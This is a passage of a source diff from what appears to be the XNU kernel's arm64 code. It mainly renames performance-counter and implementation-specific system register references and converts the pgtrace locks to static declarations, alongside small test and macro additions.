x0, x1 - msr ARM64_REG_HID0, x0 + msr HID0, x0 LOAD_UINT64 x1, HID1_DEFEATURES_2 - mrs x0, ARM64_REG_HID1 + mrs x0, HID1 orr x0, x0, x1 - msr ARM64_REG_HID1, x0 + msr HID1, x0 LOAD_UINT64 x1, HID2_DEFEATURES_2 - mrs x0, ARM64_REG_HID2 + mrs x0, HID2 orr x0, x0, x1 - msr ARM64_REG_HID2, x0 + msr HID2, x0 LOAD_UINT64 x1, HID3_DEFEATURES_2 - mrs x0, ARM64_REG_HID3 + mrs x0, HID3 orr x0, x0, x1 - msr ARM64_REG_HID3, x0 + msr HID3, x0 LOAD_UINT64 x1, HID4_DEFEATURES_2 - mrs x0, ARM64_REG_HID4 + mrs x0, S3_0_C15_C4_0 orr x0, x0, x1 - msr ARM64_REG_HID4, x0 + msr S3_0_C15_C4_0, x0 LOAD_UINT64 x1, HID7_DEFEATURES_2 - mrs x0, ARM64_REG_HID7 + mrs x0, HID7 orr x0, x0, x1 - msr ARM64_REG_HID7, x0 + msr HID7, x0 dsb sy isb sy b cpu_defeatures_set_ret diff --git a/osfmk/arm64/monotonic.h b/osfmk/arm64/monotonic.h index cd62e333a..d12abcc6f 100644 --- a/osfmk/arm64/monotonic.h +++ b/osfmk/arm64/monotonic.h @@ -65,15 +65,12 @@ __END_DECLS __BEGIN_DECLS -#define PMCR0 "s3_1_c15_c0_0" - /* set by hardware if a PMI was delivered */ #define PMCR0_PMAI (UINT64_C(1) << 11) #define PMCR0_PMI(REG) ((REG) & PMCR0_PMAI) #if HAS_UNCORE_CTRS -#define UPMSR "s3_7_c15_c6_4" #define UPMSR_PMI(REG) ((REG) & 0x1) #endif /* HAS_UNCORE_CTRS */ @@ -82,20 +79,20 @@ static inline bool mt_pmi_pending(uint64_t * restrict pmcr0_out, uint64_t * restrict upmsr_out) { - uint64_t pmcr0 = __builtin_arm_rsr64(PMCR0); + uint64_t pmcr0 = __builtin_arm_rsr64("PMCR0_EL1"); bool pmi = PMCR0_PMI(pmcr0); if (pmi) { /* * Acknowledge the PMI by clearing the pmai bit. */ - __builtin_arm_wsr64(PMCR0, pmcr0 & ~PMCR0_PMAI); + __builtin_arm_wsr64("PMCR0_EL1", pmcr0 & ~PMCR0_PMAI); } *pmcr0_out = pmcr0; #if HAS_UNCORE_CTRS extern bool mt_uncore_enabled; if (mt_uncore_enabled) { - uint64_t upmsr = __builtin_arm_rsr64(UPMSR); + uint64_t upmsr = __builtin_arm_rsr64("UPMSR_EL1"); if (UPMSR_PMI(upmsr)) { pmi = true; } diff --git a/osfmk/arm64/monotonic_arm64.c b/osfmk/arm64/monotonic_arm64.c index 8cf48ad70..06d845f8f 100644 --- a/osfmk/arm64/monotonic_arm64.c +++ b/osfmk/arm64/monotonic_arm64.c @@ -78,22 +78,10 @@ static const ml_topology_info_t *topology_info; * * PMC2+ are currently handled by kpc. */ - -#define PMC0 "s3_2_c15_c0_0" -#define PMC1 "s3_2_c15_c1_0" -#define PMC2 "s3_2_c15_c2_0" -#define PMC3 "s3_2_c15_c3_0" -#define PMC4 "s3_2_c15_c4_0" -#define PMC5 "s3_2_c15_c5_0" -#define PMC6 "s3_2_c15_c6_0" -#define PMC7 "s3_2_c15_c7_0" - #define PMC_0_7(X, A) X(0, A); X(1, A); X(2, A); X(3, A); X(4, A); X(5, A); \ X(6, A); X(7, A) #if CORE_NCTRS > 8 -#define PMC8 "s3_2_c15_c9_0" -#define PMC9 "s3_2_c15_c10_0" #define PMC_8_9(X, A) X(8, A); X(9, A) #else // CORE_NCTRS > 8 #define PMC_8_9(X, A) @@ -167,9 +155,6 @@ enum { /* * PMCR1 controls which execution modes count events. */ - -#define PMCR1 "s3_1_c15_c1_0" - #define PMCR1_EL0A32_EN(CTR) (UINT64_C(1) << (0 + CTR_POS(CTR))) #define PMCR1_EL0A64_EN(CTR) (UINT64_C(1) << (8 + CTR_POS(CTR))) #define PMCR1_EL1A64_EN(CTR) (UINT64_C(1) << (16 + CTR_POS(CTR))) @@ -190,30 +175,13 @@ core_init_execution_modes(void) { uint64_t pmcr1; - pmcr1 = __builtin_arm_rsr64(PMCR1); + pmcr1 = __builtin_arm_rsr64("PMCR1_EL1"); pmcr1 |= PMCR1_INIT; - __builtin_arm_wsr64(PMCR1, pmcr1); + __builtin_arm_wsr64("PMCR1_EL1", pmcr1); } -/* - * PMCR2 controls watchpoint registers. - * - * PMCR3 controls breakpoints and address matching. - * - * PMCR4 controls opcode matching. - */ - -#define PMCR2 "s3_1_c15_c2_0" -#define PMCR3 "s3_1_c15_c3_0" -#define PMCR4 "s3_1_c15_c4_0" - -#define PMSR "s3_1_c15_c13_0" - #define PMSR_OVF(CTR) (1ULL << (CTR)) -#define PMESR0 "S3_1_c15_c5_0" -#define PMESR1 "S3_1_c15_c6_0" - static int core_init(__unused mt_device_t dev) { @@ -231,7 +199,7 @@ uint64_t mt_core_snap(unsigned int ctr) { switch (ctr) { -#define PMC_RD(CTR, UNUSED) case (CTR): return __builtin_arm_rsr64(PMC ## CTR) +#define PMC_RD(CTR, UNUSED) case (CTR): return __builtin_arm_rsr64(__MSR_STR(PMC ## CTR)) PMC_ALL(PMC_RD, 0); #undef PMC_RD default: @@ -245,10 +213,10 @@ mt_core_set_snap(unsigned int ctr, uint64_t count) { switch (ctr) { case 0: - __builtin_arm_wsr64(PMC0, count); + __builtin_arm_wsr64("PMC0", count); break; case 1: - __builtin_arm_wsr64(PMC1, count); + __builtin_arm_wsr64("PMC1", count); break; default: panic("monotonic: invalid core counter %u write %llu", ctr, count); @@ -259,7 +227,7 @@ mt_core_set_snap(unsigned int ctr, uint64_t count) static void core_set_enabled(void) { - uint64_t pmcr0 = __builtin_arm_rsr64(PMCR0); + uint64_t pmcr0 = __builtin_arm_rsr64("PMCR0_EL1"); pmcr0 |= PMCR0_INIT | PMCR0_FIXED_EN; if (kpc_get_running() & KPC_CLASS_CONFIGURABLE_MASK) { @@ -275,12 +243,12 @@ core_set_enabled(void) pmcr0 |= kpc_ctrs; } - __builtin_arm_wsr64(PMCR0, pmcr0); + __builtin_arm_wsr64("PMCR0_EL1", pmcr0); #if MACH_ASSERT /* * Only check for the values that were ORed in. */ - uint64_t pmcr0_check = __builtin_arm_rsr64(PMCR0); + uint64_t pmcr0_check = __builtin_arm_rsr64("PMCR0_EL1"); if ((pmcr0_check & (PMCR0_INIT | PMCR0_FIXED_EN)) != (PMCR0_INIT | PMCR0_FIXED_EN)) { panic("monotonic: hardware ignored enable (read %llx, wrote %llx)", pmcr0_check, pmcr0); @@ -295,18 +263,18 @@ core_idle(__unused cpu_data_t *cpu) assert(ml_get_interrupts_enabled() == FALSE); #if DEBUG - uint64_t pmcr0 = __builtin_arm_rsr64(PMCR0); + uint64_t pmcr0 = __builtin_arm_rsr64("PMCR0_EL1"); if ((pmcr0 & PMCR0_FIXED_EN) == 0) { panic("monotonic: counters disabled before idling, pmcr0 = 0x%llx\n", pmcr0); } - uint64_t pmcr1 = __builtin_arm_rsr64(PMCR1); + uint64_t pmcr1 = __builtin_arm_rsr64("PMCR1_EL1"); if ((pmcr1 & PMCR1_INIT) == 0) { panic("monotonic: counter modes disabled before idling, pmcr1 = 0x%llx\n", pmcr1); } #endif /* DEBUG */ /* disable counters before updating */ - __builtin_arm_wsr64(PMCR0, PMCR0_INIT); + __builtin_arm_wsr64("PMCR0_EL1", PMCR0_INIT); mt_update_fixed_counts(); } @@ -348,7 +316,6 @@ static uintptr_t cpm_impl[MAX_NMONITORS] = {}; #define UPMSR_OVF(R, CTR) ((R) >> ((CTR) + UPMSR_OVF_POS) & 0x1) #define UPMSR_OVF_MASK (((UINT64_C(1) << UNCORE_NCTRS) - 1) << UPMSR_OVF_POS) -#define UPMPCM "s3_7_c15_c5_4" #define UPMPCM_CORE(ID) (UINT64_C(1) << (ID)) /* @@ -488,8 +455,7 @@ uncmon_set_counting_locked_l(__unused unsigned int monid, uint64_t enctrmask) * UPMCR0 controls which counters are enabled and how interrupts are generated * for overflows. */ -#define UPMCR0 "s3_7_c15_c0_4" - __builtin_arm_wsr64(UPMCR0, UPMCR0_INIT | enctrmask); + __builtin_arm_wsr64("UPMCR0_EL1", UPMCR0_INIT | enctrmask); } #if UNCORE_PER_CLUSTER @@ -519,25 +485,6 @@ uncmon_set_counting_locked_r(unsigned int monid, uint64_t enctrmask) * would be indexing into an array of strings. */ -#define UPMC0 "s3_7_c15_c7_4" -#define UPMC1 "s3_7_c15_c8_4" -#define UPMC2 "s3_7_c15_c9_4" -#define UPMC3 "s3_7_c15_c10_4" -#define UPMC4 "s3_7_c15_c11_4" -#define UPMC5 "s3_7_c15_c12_4" -#define UPMC6 "s3_7_c15_c13_4" -#define UPMC7 "s3_7_c15_c14_4" -#if UNCORE_NCTRS > 8 -#define UPMC8 "s3_7_c15_c0_5" -#define UPMC9 "s3_7_c15_c1_5" -#define UPMC10 "s3_7_c15_c2_5" -#define UPMC11 "s3_7_c15_c3_5" -#define UPMC12 "s3_7_c15_c4_5" -#define UPMC13 "s3_7_c15_c5_5" -#define UPMC14 "s3_7_c15_c6_5" -#define UPMC15 "s3_7_c15_c7_5" -#endif /* UNCORE_NCTRS > 8 */ - #define UPMC_0_7(X, A) X(0, A); X(1, A); X(2, A); X(3, A); X(4, A); X(5, A); \ X(6, A); X(7, A) #if UNCORE_NCTRS <= 8 @@ -553,7 +500,7 @@ uncmon_read_counter_locked_l(__unused unsigned int monid, unsigned int ctr) { assert(ctr < UNCORE_NCTRS); switch (ctr) { -#define UPMC_RD(CTR, UNUSED) case (CTR): return __builtin_arm_rsr64(UPMC ## CTR) +#define UPMC_RD(CTR, UNUSED) case (CTR): return __builtin_arm_rsr64(__MSR_STR(UPMC ## CTR)) UPMC_ALL(UPMC_RD, 0); #undef UPMC_RD default: @@ -570,7 +517,7 @@ uncmon_write_counter_locked_l(__unused unsigned int monid, unsigned int ctr, assert(ctr < UNCORE_NCTRS); switch (ctr) { #define UPMC_WR(CTR, COUNT) case (CTR): \ - return __builtin_arm_wsr64(UPMC ## CTR, (COUNT)) + return __builtin_arm_wsr64(__MSR_STR(UPMC ## CTR), (COUNT)) UPMC_ALL(UPMC_WR, count); #undef UPMC_WR default: @@ -632,12 +579,10 @@ uncmon_program_events_locked_l(unsigned int monid) * UPMESR[01] is the event selection register that determines which event a * counter will count. */ -#define UPMESR0 "s3_7_c15_c1_4" - CTRL_REG_SET(UPMESR0, uncore_config.uc_events.uce_regs[0]); + CTRL_REG_SET("UPMESR0_EL1", uncore_config.uc_events.uce_regs[0]); #if UNCORE_NCTRS > 8 -#define UPMESR1 "s3_7_c15_c11_5" - CTRL_REG_SET(UPMESR1, uncore_config.uc_events.uce_regs[1]); + CTRL_REG_SET("UPMESR1_EL1", uncore_config.uc_events.uce_regs[1]); #endif /* UNCORE_NCTRS > 8 */ /* @@ -649,21 +594,15 @@ uncmon_program_events_locked_l(unsigned int monid) * has a CPU ID of 4, it might be the first CPU in a cluster. Shift the * registers right by the ID of the first CPU in the cluster. */ -#define UPMECM0 "s3_7_c15_c3_4" -#define UPMECM1 "s3_7_c15_c4_4" - - CTRL_REG_SET(UPMECM0, + CTRL_REG_SET("UPMECM0_EL1", uncore_config.uc_cpu_masks[monid].uccm_regs[0]); - CTRL_REG_SET(UPMECM1, + CTRL_REG_SET("UPMECM1_EL1", uncore_config.uc_cpu_masks[monid].uccm_regs[1]); #if UNCORE_NCTRS > 8 -#define UPMECM2 "s3_7_c15_c8_5" -#define UPMECM3 "s3_7_c15_c9_5" - - CTRL_REG_SET(UPMECM2, + CTRL_REG_SET("UPMECM2_EL1", uncore_config.uc_cpu_masks[monid].uccm_regs[2]); - CTRL_REG_SET(UPMECM3, + CTRL_REG_SET("UPMECM3_EL1", uncore_config.uc_cpu_masks[monid].uccm_regs[3]); #endif /* UNCORE_NCTRS > 8 */ } @@ -697,7 +636,7 @@ uncmon_program_events_locked_r(unsigned int monid) static void uncmon_clear_int_locked_l(__unused unsigned int monid) { - __builtin_arm_wsr64(UPMSR, 0); + __builtin_arm_wsr64("UPMSR_EL1", 0); } #if UNCORE_PER_CLUSTER @@ -740,7 +679,7 @@ uncmon_init_locked_l(unsigned int monid) * UPMPCM defines the PMI core mask for the UPMCs -- which cores should * receive interrupts on overflow. */ - CTRL_REG_SET(UPMPCM, uncmon_get_pmi_mask(monid)); + CTRL_REG_SET("UPMPCM_EL1", uncmon_get_pmi_mask(monid)); uncmon_set_counting_locked_l(monid, mt_uncore_enabled ? uncore_active_ctrs : 0); } @@ -821,7 +760,7 @@ uncore_init(__unused mt_device_t dev) #endif /* UNCORE_PER_CLUSTER */ struct uncore_monitor *mon = &uncore_monitors[monid]; - lck_spin_init(&mon->um_lock, mt_lock_grp, NULL); + lck_spin_init(&mon->um_lock, &mt_lock_grp, LCK_ATTR_NULL); int intrs_en = uncmon_lock(mon); if (monid != curmonid) { @@ -1261,7 +1200,7 @@ mt_cpu_pmi(cpu_data_t *cpu, uint64_t pmcr0) assert(cpu != NULL); assert(ml_get_interrupts_enabled() == FALSE); - __builtin_arm_wsr64(PMCR0, PMCR0_INIT); + __builtin_arm_wsr64("PMCR0_EL1", PMCR0_INIT); /* * Ensure the CPMU has flushed any increments at this point, so PMSR is up * to date. @@ -1280,7 +1219,7 @@ mt_cpu_pmi(cpu_data_t *cpu, uint64_t pmcr0) #pragma unused(pmcr0) #endif /* !MONOTONIC_DEBUG */ - uint64_t pmsr = __builtin_arm_rsr64(PMSR); + uint64_t pmsr = __builtin_arm_rsr64("PMSR_EL1"); #if MONOTONIC_DEBUG printf("monotonic: cpu = %d, PMSR = 0x%llx, PMCR0 = 0x%llx\n", @@ -1336,7 +1275,7 @@ mt_cpu_pmi(cpu_data_t *cpu, uint64_t pmcr0) } #if MACH_ASSERT - uint64_t pmsr_after_handling = __builtin_arm_rsr64(PMSR); + uint64_t pmsr_after_handling = __builtin_arm_rsr64("PMSR_EL1"); if (pmsr_after_handling != 0) { unsigned int first_ctr_ovf = __builtin_ffsll(pmsr_after_handling) - 1; uint64_t count = 0; @@ -1350,7 +1289,7 @@ mt_cpu_pmi(cpu_data_t *cpu, uint64_t pmcr0) panic("monotonic: PMI status not cleared on exit from handler, " "PMSR = 0x%llx HANDLE -> -> 0x%llx, handled 0x%llx, " "PMCR0 = 0x%llx, PMC%d = 0x%llx%s", pmsr, pmsr_after_handling, - handled, __builtin_arm_rsr64(PMCR0), first_ctr_ovf, count, extra); + handled, __builtin_arm_rsr64("PMCR0_EL1"), first_ctr_ovf, count, extra); } #endif /* MACH_ASSERT */ @@ -1366,7 +1305,7 @@ mt_cpmu_aic_pmi(cpu_id_t source) panic("monotonic: PMI from IOCPU %p delivered to %p", source, curcpu->interrupt_nub); } - mt_cpu_pmi(curcpu, __builtin_arm_rsr64(PMCR0)); + mt_cpu_pmi(curcpu, __builtin_arm_rsr64("PMCR0_EL1")); } #endif /* CPMU_AIC_PMI */ @@ -1393,7 +1332,7 @@ mt_microstackshot_start_remote(__unused void *arg) { cpu_data_t *cpu = getCpuDatap(); - __builtin_arm_wsr64(PMCR0, PMCR0_INIT); + __builtin_arm_wsr64("PMCR0_EL1", PMCR0_INIT); for (int i = 0; i < MT_CORE_NFIXED; i++) { uint64_t count = mt_cpu_update_count(cpu, i); diff --git a/osfmk/arm64/pgtrace.c b/osfmk/arm64/pgtrace.c index d13c8415b..d9b2d634c 100644 --- a/osfmk/arm64/pgtrace.c +++ b/osfmk/arm64/pgtrace.c @@ -70,7 +70,6 @@ static struct { log_t *logs; // Protect uint32_t size; // Protect uint64_t rdidx, wridx; // Protect - decl_simple_lock_data(, loglock); uint64_t id; uint32_t option; @@ -78,12 +77,11 @@ static struct { uint32_t bytes; queue_head_t probes; // Protect +} pgtrace; - lck_grp_t *lock_grp; - lck_grp_attr_t *lock_grp_attr; - lck_attr_t *lock_attr; - lck_mtx_t probelock; -} pgtrace = {}; +static LCK_GRP_DECLARE(pgtrace_lock_grp, "pgtrace_lock"); +static LCK_MTX_DECLARE(pgtrace_probelock, &pgtrace_lock_grp); +static SIMPLE_LOCK_DECLARE(pgtrace_loglock, 0); //-------------------------------------------- // Globals @@ -91,14 +89,6 @@ static struct { void pgtrace_init(void) { - simple_lock_init(&pgtrace.loglock, 0); - - pgtrace.lock_attr = lck_attr_alloc_init(); - pgtrace.lock_grp_attr = lck_grp_attr_alloc_init(); - pgtrace.lock_grp = lck_grp_alloc_init("pgtrace_lock", pgtrace.lock_grp_attr); - - lck_mtx_init(&pgtrace.probelock, pgtrace.lock_grp, pgtrace.lock_attr); - queue_init(&pgtrace.probes); pgtrace.size = RBUF_DEFAULT_SIZE; @@ -111,7 +101,7 @@ pgtrace_clear_probe(void) probe_t *p, *next; queue_head_t *q = &pgtrace.probes; - lck_mtx_lock(&pgtrace.probelock); + lck_mtx_lock(&pgtrace_probelock); p = (probe_t *)queue_first(q); while (!queue_end(q, (queue_entry_t)p)) { @@ -123,9 +113,7 @@ pgtrace_clear_probe(void) p = next; } - lck_mtx_unlock(&pgtrace.probelock); - - return; + lck_mtx_unlock(&pgtrace_probelock); } int @@ -148,9 +136,9 @@ pgtrace_add_probe(thread_t thread, vm_offset_t start, vm_offset_t end) p->pmap = vm_map_pmap(thread->map); } - lck_mtx_lock(&pgtrace.probelock); + lck_mtx_lock(&pgtrace_probelock); queue_enter(q, p, probe_t *, chain); - lck_mtx_unlock(&pgtrace.probelock); + lck_mtx_unlock(&pgtrace_probelock); return 0; } @@ -169,15 +157,13 @@ pgtrace_start(void) pgtrace.enabled = 1; - lck_mtx_lock(&pgtrace.probelock); + lck_mtx_lock(&pgtrace_probelock); queue_iterate(q, p, probe_t *, chain) { pmap_pgtrace_add_page(p->pmap, p->start, p->end); } - lck_mtx_unlock(&pgtrace.probelock); - - return; + lck_mtx_unlock(&pgtrace_probelock); } void @@ -188,13 +174,13 @@ pgtrace_stop(void) kprintf("%s\n", __func__); - lck_mtx_lock(&pgtrace.probelock); + lck_mtx_lock(&pgtrace_probelock); queue_iterate(q, p, probe_t *, chain) { pmap_pgtrace_delete_page(p->pmap, p->start, p->end); } - lck_mtx_unlock(&pgtrace.probelock); + lck_mtx_unlock(&pgtrace_probelock); pgtrace.enabled = 0; } @@ -229,13 +215,13 @@ pgtrace_set_size(uint32_t size) pgtrace_stop(); - simple_lock(&pgtrace.loglock); + simple_lock(&pgtrace_loglock); old_buf = pgtrace.logs; old_size = pgtrace.size; pgtrace.logs = new_buf; pgtrace.size = new_size; pgtrace.rdidx = pgtrace.wridx = 0; - simple_unlock(&pgtrace.loglock); + simple_unlock(&pgtrace_loglock); if (old_buf) { kfree(old_buf, old_size * sizeof(log_t)); @@ -247,9 +233,9 @@ pgtrace_set_size(uint32_t size) void pgtrace_clear_trace(void) { - simple_lock(&pgtrace.loglock); + simple_lock(&pgtrace_loglock); pgtrace.rdidx = pgtrace.wridx = 0; - simple_unlock(&pgtrace.loglock); + simple_unlock(&pgtrace_loglock); } boolean_t @@ -304,7 +290,7 @@ pgtrace_write_log(pgtrace_run_result_t res) pgtrace.bytes += sizeof(log); - simple_lock(&pgtrace.loglock); + simple_lock(&pgtrace_loglock); pgtrace.logs[RBUF_IDX(pgtrace.wridx, pgtrace.size - 1)] = log; @@ -320,9 +306,7 @@ pgtrace_write_log(pgtrace_run_result_t res) thread_wakeup(pgtrace.logs); } - simple_unlock(&pgtrace.loglock); - - return; + simple_unlock(&pgtrace_loglock); } // pgtrace_read_log() is in user thread @@ -345,13 +329,13 @@ pgtrace_read_log(uint8_t *buf, uint32_t size) } ints = ml_set_interrupts_enabled(FALSE); - simple_lock(&pgtrace.loglock); + simple_lock(&pgtrace_loglock); // Wait if ring is empty if (pgtrace.rdidx == pgtrace.wridx) { assert_wait(pgtrace.logs, THREAD_ABORTSAFE); - simple_unlock(&pgtrace.loglock); + simple_unlock(&pgtrace_loglock); ml_set_interrupts_enabled(ints); wr = thread_block(NULL); @@ -360,7 +344,7 @@ pgtrace_read_log(uint8_t *buf, uint32_t size) } ints = ml_set_interrupts_enabled(FALSE); - simple_lock(&pgtrace.loglock); + simple_lock(&pgtrace_loglock); } // Trim the size @@ -386,7 +370,7 @@ pgtrace_read_log(uint8_t *buf, uint32_t size) pgtrace.rdidx += total; - simple_unlock(&pgtrace.loglock); + simple_unlock(&pgtrace_loglock); ml_set_interrupts_enabled(ints); return total * sizeof(log_t); @@ -412,12 +396,10 @@ static struct { decoder_t *decoder; logger_t *logger; queue_head_t probes; +} pgtrace; - lck_grp_t *lock_grp; - lck_grp_attr_t *lock_grp_attr; - lck_attr_t *lock_attr; - lck_mtx_t probelock; -} pgtrace = {}; +static LCK_GRP_DECLARE(pgtrace_lock_grp, "pgtrace_lock"); +static LCK_MTX_DECLARE(pgtrace_probelock, &pgtrace_lock_grp); //------------------------------------ // functions for pmap fault handler @@ -482,12 +464,6 @@ pgtrace_init(decoder_t *decoder, logger_t *logger) return EINVAL; } - pgtrace.lock_attr = lck_attr_alloc_init(); - pgtrace.lock_grp_attr = lck_grp_attr_alloc_init(); - pgtrace.lock_grp = lck_grp_alloc_init("pgtrace_lock", pgtrace.lock_grp_attr); - - lck_mtx_init(&pgtrace.probelock, pgtrace.lock_grp, pgtrace.lock_attr); - queue_init(&pgtrace.probes); pgtrace.decoder = decoder; pgtrace.logger = logger; @@ -517,9 +493,9 @@ pgtrace_add_probe(thread_t thread, vm_offset_t start, vm_offset_t end) p->pmap = vm_map_pmap(thread->map); } - lck_mtx_lock(&pgtrace.probelock); + lck_mtx_lock(&pgtrace_probelock); queue_enter(q, p, probe_t *, chain); - lck_mtx_unlock(&pgtrace.probelock); + lck_mtx_unlock(&pgtrace_probelock); return 0; } @@ -532,7 +508,7 @@ pgtrace_clear_probe(void) kprintf("%s\n", __func__); - lck_mtx_lock(&pgtrace.probelock); + lck_mtx_lock(&pgtrace_probelock); p = (probe_t *)queue_first(q); while (!queue_end(q, (queue_entry_t)p)) { @@ -544,9 +520,7 @@ pgtrace_clear_probe(void) p = next; } - lck_mtx_unlock(&pgtrace.probelock); - - return; + lck_mtx_unlock(&pgtrace_probelock); } void @@ -563,15 +537,13 @@ pgtrace_start(void) pgtrace.active = true; - lck_mtx_lock(&pgtrace.probelock); + lck_mtx_lock(&pgtrace_probelock); queue_iterate(q, p, probe_t *, chain) { pmap_pgtrace_add_page(p->pmap, p->start, p->end); } - lck_mtx_unlock(&pgtrace.probelock); - - return; + lck_mtx_unlock(&pgtrace_probelock); } void @@ -582,13 +554,13 @@ pgtrace_stop(void) kprintf("%s\n", __func__); - lck_mtx_lock(&pgtrace.probelock); + lck_mtx_lock(&pgtrace_probelock); queue_iterate(q, p, probe_t *, chain) { pmap_pgtrace_delete_page(p->pmap, p->start, p->end); } - lck_mtx_unlock(&pgtrace.probelock); + lck_mtx_unlock(&pgtrace_probelock); pgtrace.active = false; } diff --git a/osfmk/arm64/platform_tests.c b/osfmk/arm64/platform_tests.c index 37eb2dda1..f05b33b2d 100644 --- a/osfmk/arm64/platform_tests.c +++ b/osfmk/arm64/platform_tests.c @@ -1050,6 +1050,7 @@ struct munger_test { {MT_FUNC(munge_wws), 3, 3, {MT_W_VAL, MT_W_VAL, MT_S_VAL}}, {MT_FUNC(munge_wwwsw), 5, 5, {MT_W_VAL, MT_W_VAL, MT_W_VAL, MT_S_VAL, MT_W_VAL}}, {MT_FUNC(munge_llllll), 12, 6, {MT_L_VAL, MT_L_VAL, MT_L_VAL, MT_L_VAL, MT_L_VAL, MT_L_VAL}}, + {MT_FUNC(munge_llll), 8, 4, {MT_L_VAL, MT_L_VAL, MT_L_VAL, MT_L_VAL}}, {MT_FUNC(munge_l), 2, 1, {MT_L_VAL}}, {MT_FUNC(munge_lw), 3, 2, {MT_L_VAL, MT_W_VAL}}, {MT_FUNC(munge_lwww), 5, 4, {MT_L_VAL, MT_W_VAL, MT_W_VAL, MT_W_VAL}}, @@ -1183,16 +1184,16 @@ arm64_ropjop_test() if (config_jop_enabled) { /* jop key */ - uint64_t apiakey_hi = __builtin_arm_rsr64(ARM64_REG_APIAKEYHI_EL1); - uint64_t apiakey_lo = __builtin_arm_rsr64(ARM64_REG_APIAKEYLO_EL1); + uint64_t apiakey_hi = __builtin_arm_rsr64("APIAKEYHI_EL1"); + uint64_t apiakey_lo = __builtin_arm_rsr64("APIAKEYLO_EL1"); T_EXPECT(apiakey_hi != 0 && apiakey_lo != 0, NULL); } if (config_rop_enabled) { /* rop key */ - uint64_t apibkey_hi = __builtin_arm_rsr64(ARM64_REG_APIBKEYHI_EL1); - uint64_t apibkey_lo = __builtin_arm_rsr64(ARM64_REG_APIBKEYLO_EL1); + uint64_t apibkey_hi = __builtin_arm_rsr64("APIBKEYHI_EL1"); + uint64_t apibkey_lo = __builtin_arm_rsr64("APIBKEYLO_EL1"); T_EXPECT(apibkey_hi != 0 && apibkey_lo != 0, NULL); @@ -1617,13 +1618,13 @@ arm64_spr_lock_test() thread_block(THREAD_CONTINUE_NULL); T_LOG("Running SPR lock test on cpu %d\n", p->cpu_id); - uint64_t orig_value = __builtin_arm_rsr64(STR(ARM64_REG_HID8)); + uint64_t orig_value = __builtin_arm_rsr64(STR(S3_0_C15_C8_0)); spr_lock_test_addr = (vm_offset_t)VM_KERNEL_STRIP_PTR(arm64_msr_lock_test); spr_lock_exception_esr = 0; arm64_msr_lock_test(~orig_value); T_EXPECT(spr_lock_exception_esr != 0, "MSR write generated synchronous abort"); - uint64_t new_value = __builtin_arm_rsr64(STR(ARM64_REG_HID8)); + uint64_t new_value = __builtin_arm_rsr64(STR(S3_0_C15_C8_0)); T_EXPECT(orig_value == new_value, "MSR write did not succeed"); spr_lock_test_addr = 0; diff --git a/osfmk/arm64/platform_tests_asm.s b/osfmk/arm64/platform_tests_asm.s index 5ec159e48..7b41b5083 100644 --- a/osfmk/arm64/platform_tests_asm.s +++ b/osfmk/arm64/platform_tests_asm.s @@ -34,6 +34,6 @@ .align 2 .globl EXT(arm64_msr_lock_test) LEXT(arm64_msr_lock_test) - msr ARM64_REG_HID8, x0 + msr S3_0_C15_C8_0, x0 ret #endif diff --git a/osfmk/arm64/proc_reg.h b/osfmk/arm64/proc_reg.h index 307027f7c..545142ba4 100644 --- a/osfmk/arm64/proc_reg.h +++ b/osfmk/arm64/proc_reg.h @@ -1378,6 +1378,8 @@ #define ARM_PTE_NX 0x0040000000000000ULL /* value for no execute bit */ #define ARM_PTE_NXMASK 0x0040000000000000ULL /* no execute mask */ +#define ARM_PTE_XMASK (ARM_PTE_PNXMASK | ARM_PTE_NXMASK) + #define ARM_PTE_WIRED 0x0400000000000000ULL /* value for software wired bit */ #define ARM_PTE_WIRED_MASK 0x0400000000000000ULL /* software wired mask */ @@ -2057,6 +2059,19 @@ b.ne 1f 1: .endmacro +/* + * Wedges CPUs with a specified core that are below a specified revision. This + * macro is intended for CPUs that have been deprecated in iBoot and may have + * incorrect behavior if they continue running xnu. + */ +.macro DEPRECATE_COREEQ_REVLO core, rev, midr_el1, scratch +EXEC_COREEQ_REVLO \core, \rev, \midr_el1, \scratch +/* BEGIN IGNORE CODESTYLE */ +b . +/* END IGNORE CODESTYLE */ +EXEC_END +.endmacro + /* * Sets bits in an SPR register. * arg0: Name of the register to be accessed. diff --git a/osfmk/arm64/sleh.c b/osfmk/arm64/sleh.c index 51bd6a69b..a84e319f8 100644 --- a/osfmk/arm64/sleh.c +++ b/osfmk/arm64/sleh.c @@ -68,6 +68,7 @@ + #ifndef __arm64__ #error Should only be compiling for arm64. #endif @@ -109,6 +110,9 @@ void panic_with_thread_kernel_state(const char *msg, arm_saved_state_t *ss) __ab void sleh_synchronous_sp1(arm_context_t *, uint32_t, vm_offset_t) __abortlike; void sleh_synchronous(arm_context_t *, uint32_t, vm_offset_t); + + + void sleh_irq(arm_saved_state_t *); void sleh_fiq(arm_saved_state_t *); void sleh_serror(arm_context_t *context, uint32_t esr, vm_offset_t far); @@ -324,12 +328,12 @@ arm64_implementation_specific_error(arm_saved_state_t *state, uint32_t esr, vm_o #if defined(NO_ECORE) uint64_t l2c_err_sts, l2c_err_adr, l2c_err_inf; - mmu_err_sts = __builtin_arm_rsr64(STR(ARM64_REG_MMU_ERR_STS)); - l2c_err_sts = __builtin_arm_rsr64(STR(ARM64_REG_L2C_ERR_STS)); - l2c_err_adr = __builtin_arm_rsr64(STR(ARM64_REG_L2C_ERR_ADR)); - l2c_err_inf = __builtin_arm_rsr64(STR(ARM64_REG_L2C_ERR_INF)); - lsu_err_sts = __builtin_arm_rsr64(STR(ARM64_REG_LSU_ERR_STS)); - fed_err_sts = __builtin_arm_rsr64(STR(ARM64_REG_FED_ERR_STS)); + mmu_err_sts = __builtin_arm_rsr64(STR(S3_6_C15_C0_0)); + l2c_err_sts = __builtin_arm_rsr64(STR(S3_3_C15_C8_0)); + l2c_err_adr = __builtin_arm_rsr64(STR(S3_3_C15_C9_0)); + l2c_err_inf = __builtin_arm_rsr64(STR(S3_3_C15_C10_0)); + lsu_err_sts = __builtin_arm_rsr64(STR(S3_3_C15_C0_0)); + fed_err_sts = __builtin_arm_rsr64(STR(S3_4_C15_C0_0)); panic_plain("Unhandled " CPU_NAME " implementation specific error. state=%p esr=%#x far=%p\n" @@ -343,13 +347,13 @@ arm64_implementation_specific_error(arm_saved_state_t *state, uint32_t esr, vm_o uint64_t l2c_err_sts, l2c_err_adr, l2c_err_inf, mpidr, migsts; mpidr = __builtin_arm_rsr64("MPIDR_EL1"); - migsts = __builtin_arm_rsr64(STR(ARM64_REG_MIGSTS_EL1)); - mmu_err_sts = __builtin_arm_rsr64(STR(ARM64_REG_MMU_ERR_STS)); - l2c_err_sts = 